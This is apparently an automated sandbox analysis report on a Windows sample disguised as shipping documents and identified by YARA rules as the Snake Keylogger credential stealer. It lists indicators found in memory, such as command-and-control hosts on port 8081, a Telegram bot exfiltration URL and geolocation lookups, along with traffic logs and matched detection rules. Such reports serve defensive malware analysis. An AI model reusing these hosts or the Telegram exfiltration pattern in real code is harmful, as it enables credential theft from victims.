Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.starfieldtech.com/sfig2s1-677.crl0c
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000323F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.bulatpharmaceutical.com
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.starfieldtech.com/08
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.starfieldtech.com/0;
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.starfieldtech.com/0F
Source: rShippingDocuments240384.exe, 00000000.00000002.1486523776.00000000034E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1527172861.0000000002D65000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rShippingDocuments240384.exe, tdcorV.exe.0.dr String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000433000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3917772497.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000009.00000002.3936091914.000000000650D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3919639606.00000000011D5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://certs.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 0000000E.00000002.3920889252.0000000003282000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000327D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.0000000003110000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: rShippingDocuments240384.exe, 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D50000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3917774327.0000000000434000.00000040.00000400.00020000.00000000.sdmp, tdcorV.exe, 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.0000000003110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000E.00000002.3920889252.000000000313A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.3921187548.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000317F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.000000000313A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.72$
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3927879096.00000000040E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000009.00000002.3928058550.0000000003D22000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 0000000E.00000002.3920889252.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000032A4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000009.00000002.3921187548.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3920889252.00000000032AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 51299 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51300 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51300
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51299
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:51300 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tdcorV.exe.46bb4c0.1.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.rShippingDocuments240384.exe.4e3a448.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.tdcorV.exe.46bb4c0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.1538098270.0000000004388000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1488924895.0000000004B07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: rShippingDocuments240384.exe
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process Stats: CPU usage > 49%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32F70 NtQueryInformationProcess, 0_2_07C32F70
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32F68 NtQueryInformationProcess, 0_2_07C32F68
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07112F70 NtQueryInformationProcess, 10_2_07112F70
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07112F68 NtQueryInformationProcess, 10_2_07112F68
Detected potential crypto function
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_05794868 0_2_05794868
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_05794859 0_2_05794859
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1EF18 0_2_07C1EF18
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C1EF11 0_2_07C1EF11
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C30308 0_2_07C30308
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C34CC0 0_2_07C34CC0
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C3B6E8 0_2_07C3B6E8
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32380 0_2_07C32380
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C30303 0_2_07C30303
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C3D1F8 0_2_07C3D1F8
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C330F0 0_2_07C330F0
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C31F43 0_2_07C31F43
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C3BF58 0_2_07C3BF58
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C34F20 0_2_07C34F20
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C34F30 0_2_07C34F30
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C34CB3 0_2_07C34CB3
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C3DBF8 0_2_07C3DBF8
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C3BB20 0_2_07C3BB20
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_07C32840 0_2_07C32840
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe Code function: 0_2_09843178 0_2_09843178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B7118 9_2_013B7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BC146 9_2_013BC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BA088 9_2_013BA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B5362 9_2_013B5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BD278 9_2_013BD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BC468 9_2_013BC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BC738 9_2_013BC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B69B0 9_2_013B69B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BE988 9_2_013BE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BCA08 9_2_013BCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BCCD8 9_2_013BCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BCFAA 9_2_013BCFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BE97A 9_2_013BE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013BF961 9_2_013BF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B39EE 9_2_013B39EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B29EC 9_2_013B29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B3AA1 9_2_013B3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_013B3E09 9_2_013B3E09
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_02914859 10_2_02914859
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_02914868 10_2_02914868
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_05583140 10_2_05583140
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_05583107 10_2_05583107
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0558AE50 10_2_0558AE50
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_05584E00 10_2_05584E00
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_070FEF18 10_2_070FEF18
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_070FEED8 10_2_070FEED8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07110308 10_2_07110308
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07114CC0 10_2_07114CC0
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0711B6E8 10_2_0711B6E8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07112380 10_2_07112380
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_071102F9 10_2_071102F9
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0711D1F8 10_2_0711D1F8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_071130F0 10_2_071130F0
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07114F30 10_2_07114F30
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07111F37 10_2_07111F37
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07114F20 10_2_07114F20
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0711BF58 10_2_0711BF58
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07114EDF 10_2_07114EDF
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07114CB3 10_2_07114CB3
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0711BB20 10_2_0711BB20
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0711DBF8 10_2_0711DBF8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_0711DBE8 10_2_0711DBE8
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_07112840 10_2_07112840
Source: C:\Users\user\AppData\Roaming\tdcorV.exe Code function: 10_2_08AF25D0 10_2_08AF25D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A5362 14_2_030A5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AD278 14_2_030AD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A7118 14_2_030A7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AC146 14_2_030AC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AA088 14_2_030AA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AC738 14_2_030AC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AC468 14_2_030AC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030ACA08 14_2_030ACA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030AE988 14_2_030AE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_030A69A0 14_2_030A69A0
